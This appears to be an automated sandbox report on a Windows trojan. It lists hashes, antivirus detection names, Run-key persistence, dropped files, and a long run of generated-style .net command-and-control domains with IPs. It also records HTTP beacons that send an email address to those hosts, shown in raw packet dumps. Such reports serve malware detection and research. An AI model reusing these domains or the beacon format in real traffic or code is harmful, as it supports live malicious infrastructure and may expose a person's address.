Analysis Date2015-09-15 23:43:03
MD5741265a41325510d7776b9f9ddbe946e
SHA177b4dce231faca91162e7a23f7bf233d7009c739

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 2e46fc83f077d909fde6a30e107bcbd6 sha1: 0ce3464dfab4d84616e16f7fef2a3ca0b3f9f093 size: 300544
Section.rdata md5: 8703a922799b7b665f867be341ae8a58 sha1: 3ab42f98eb9eef3781aeee502a0cab81a65a9f42 size: 34816
Section.data md5: 86d9cade827d6e7eacd4be38cb1b1b43 sha1: fff055bd079f3c290469f48a53081ee9c399991c size: 105984
Timestamp2014-10-30 10:25:34
PackerMicrosoft Visual C++ ?.?
PEhasheada0daa4997c018ce8191331073299128de2992
IMPhashe923df0922261aab505b6087112d90ca
AVRisingno_virus
AVMcafeeTrojan-FEMT!741265A41325
AVAvira (antivir)BDS/Zegost.Gen4
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVEset (nod32)Win32/Agent.VNC
AVGrisoft (avg)Win32/Cryptor
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Agent.VNC!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7Trojan ( 004938ec1 )
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTROJ_FORUCON.BMC
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVClamAVno_virus
AVDr. WebTrojan.DownLoader12.23558
AVF-SecureGen:Variant.Symmi.22722
AVCA (E-Trust Ino)Win32/Nivdort.XAYK!suspicious

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Now Browser Human Registrar Client Framework ➝
C:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\jtmkajjcj\seajgptj.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.kui
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.exe"

Network Details:

DNSfreshservice.net
Type: A
104.28.12.142
DNSfreshservice.net
Type: A
104.28.13.142
DNSbeginservice.net
Type: A
195.22.26.252
DNSbeginservice.net
Type: A
195.22.26.253
DNSbeginservice.net
Type: A
195.22.26.254
DNSbeginservice.net
Type: A
195.22.26.231
DNSknownservice.net
Type: A
108.160.154.105
DNSbeginriver.net
Type: A
95.211.230.75
DNScrowdservice.net
Type: A
166.78.103.6
DNSwatermister.net
Type: A
192.185.5.125
DNSwaterservice.net
Type: A
207.148.248.143
DNSwomanservice.net
Type: A
31.31.204.59
DNSpartyservice.net
Type: A
176.28.54.20
DNSfreshshare.net
Type: A
216.239.34.21
DNSfreshshare.net
Type: A
216.239.36.21
DNSfreshshare.net
Type: A
216.239.38.21
DNSfreshshare.net
Type: A
184.168.221.32
DNSfreshshare.net
Type: A
216.239.32.21
DNSexperienceshare.net
Type: A
50.63.202.60
DNSwomanarticle.net
Type: A
DNSsmokearticle.net
Type: A
DNSpartydried.net
Type: A
DNSfightdried.net
Type: A
DNSpartyfifteen.net
Type: A
DNSfightfifteen.net
Type: A
DNSpartyangry.net
Type: A
DNSfightangry.net
Type: A
DNSpartyarticle.net
Type: A
DNSfightarticle.net
Type: A
DNSfreshmister.net
Type: A
DNSexperiencemister.net
Type: A
DNSfreshsuppose.net
Type: A
DNSexperiencesuppose.net
Type: A
DNSexperienceservice.net
Type: A
DNSfreshriver.net
Type: A
DNSexperienceriver.net
Type: A
DNSgentlemanmister.net
Type: A
DNSalreadymister.net
Type: A
DNSgentlemansuppose.net
Type: A
DNSalreadysuppose.net
Type: A
DNSgentlemanservice.net
Type: A
DNSalreadyservice.net
Type: A
DNSgentlemanriver.net
Type: A
DNSalreadyriver.net
Type: A
DNSfollowmister.net
Type: A
DNSmembermister.net
Type: A
DNSfollowsuppose.net
Type: A
DNSmembersuppose.net
Type: A
DNSfollowservice.net
Type: A
DNSmemberservice.net
Type: A
DNSfollowriver.net
Type: A
DNSmemberriver.net
Type: A
DNSbeginmister.net
Type: A
DNSknownmister.net
Type: A
DNSbeginsuppose.net
Type: A
DNSknownsuppose.net
Type: A
DNSknownriver.net
Type: A
DNSsummermister.net
Type: A
DNScrowdmister.net
Type: A
DNSsummersuppose.net
Type: A
DNScrowdsuppose.net
Type: A
DNSsummerservice.net
Type: A
DNSsummerriver.net
Type: A
DNScrowdriver.net
Type: A
DNSthoughtmister.net
Type: A
DNSthoughtsuppose.net
Type: A
DNSwatersuppose.net
Type: A
DNSthoughtservice.net
Type: A
DNSthoughtriver.net
Type: A
DNSwaterriver.net
Type: A
DNSwomanmister.net
Type: A
DNSsmokemister.net
Type: A
DNSwomansuppose.net
Type: A
DNSsmokesuppose.net
Type: A
DNSsmokeservice.net
Type: A
DNSwomanriver.net
Type: A
DNSsmokeriver.net
Type: A
DNSpartymister.net
Type: A
DNSfightmister.net
Type: A
DNSpartysuppose.net
Type: A
DNSfightsuppose.net
Type: A
DNSfightservice.net
Type: A
DNSpartyriver.net
Type: A
DNSfightriver.net
Type: A
DNSfreshnearly.net
Type: A
DNSexperiencenearly.net
Type: A
DNSfreshhappen.net
Type: A
DNSexperiencehappen.net
Type: A
DNSfreshshake.net
Type: A
DNSexperienceshake.net
Type: A
DNSgentlemannearly.net
Type: A
DNSalreadynearly.net
Type: A
DNSgentlemanhappen.net
Type: A
HTTP GEThttp://freshservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GEThttp://beginservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GEThttp://knownservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GEThttp://beginriver.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GEThttp://crowdservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GEThttp://watermister.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GEThttp://waterservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GEThttp://womanservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GEThttp://partyservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GEThttp://freshshare.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GEThttp://experienceshare.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 104.28.12.142:80
Flows TCP192.168.1.1:1032 ➝ 195.22.26.252:80
Flows TCP192.168.1.1:1033 ➝ 108.160.154.105:80
Flows TCP192.168.1.1:1034 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1035 ➝ 166.78.103.6:80
Flows TCP192.168.1.1:1036 ➝ 192.185.5.125:80
Flows TCP192.168.1.1:1037 ➝ 207.148.248.143:80
Flows TCP192.168.1.1:1038 ➝ 31.31.204.59:80
Flows TCP192.168.1.1:1039 ➝ 176.28.54.20:80
Flows TCP192.168.1.1:1040 ➝ 216.239.34.21:80
Flows TCP192.168.1.1:1041 ➝ 50.63.202.60:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d66636f 6f706d73 40726473   mail=fcoopms@rds
0x00000020 (00032)   6c696e6b 2e726f26 6d657468 6f643d70   link.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 66726573 68736572   ..Host: freshser
0x00000070 (00112)   76696365 2e6e6574 0d0a0d0a            vice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d66636f 6f706d73 40726473   mail=fcoopms@rds
0x00000020 (00032)   6c696e6b 2e726f26 6d657468 6f643d70   link.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 62656769 6e736572   ..Host: beginser
0x00000070 (00112)   76696365 2e6e6574 0d0a0d0a            vice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d66636f 6f706d73 40726473   mail=fcoopms@rds
0x00000020 (00032)   6c696e6b 2e726f26 6d657468 6f643d70   link.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6b6e6f77 6e736572   ..Host: knownser
0x00000070 (00112)   76696365 2e6e6574 0d0a0d0a            vice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d66636f 6f706d73 40726473   mail=fcoopms@rds
0x00000020 (00032)   6c696e6b 2e726f26 6d657468 6f643d70   link.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 62656769 6e726976   ..Host: beginriv
0x00000070 (00112)   65722e6e 65740d0a 0d0a0d0a            er.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d66636f 6f706d73 40726473   mail=fcoopms@rds
0x00000020 (00032)   6c696e6b 2e726f26 6d657468 6f643d70   link.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 63726f77 64736572   ..Host: crowdser
0x00000070 (00112)   76696365 2e6e6574 0d0a0d0a            vice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d66636f 6f706d73 40726473   mail=fcoopms@rds
0x00000020 (00032)   6c696e6b 2e726f26 6d657468 6f643d70   link.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 77617465 726d6973   ..Host: watermis
0x00000070 (00112)   7465722e 6e65740d 0a0d0a0a            ter.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d66636f 6f706d73 40726473   mail=fcoopms@rds
0x00000020 (00032)   6c696e6b 2e726f26 6d657468 6f643d70   link.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 77617465 72736572   ..Host: waterser
0x00000070 (00112)   76696365 2e6e6574 0d0a0d0a            vice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d66636f 6f706d73 40726473   mail=fcoopms@rds
0x00000020 (00032)   6c696e6b 2e726f26 6d657468 6f643d70   link.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 776f6d61 6e736572   ..Host: womanser
0x00000070 (00112)   76696365 2e6e6574 0d0a0d0a            vice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d66636f 6f706d73 40726473   mail=fcoopms@rds
0x00000020 (00032)   6c696e6b 2e726f26 6d657468 6f643d70   link.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 70617274 79736572   ..Host: partyser
0x00000070 (00112)   76696365 2e6e6574 0d0a0d0a            vice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d66636f 6f706d73 40726473   mail=fcoopms@rds
0x00000020 (00032)   6c696e6b 2e726f26 6d657468 6f643d70   link.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 66726573 68736861   ..Host: freshsha
0x00000070 (00112)   72652e6e 65740d0a 0d0a0d0a            re.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d66636f 6f706d73 40726473   mail=fcoopms@rds
0x00000020 (00032)   6c696e6b 2e726f26 6d657468 6f643d70   link.ro&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 65787065 7269656e   ..Host: experien
0x00000070 (00112)   63657368 6172652e 6e65740d 0a0d0a     ceshare.net....


Strings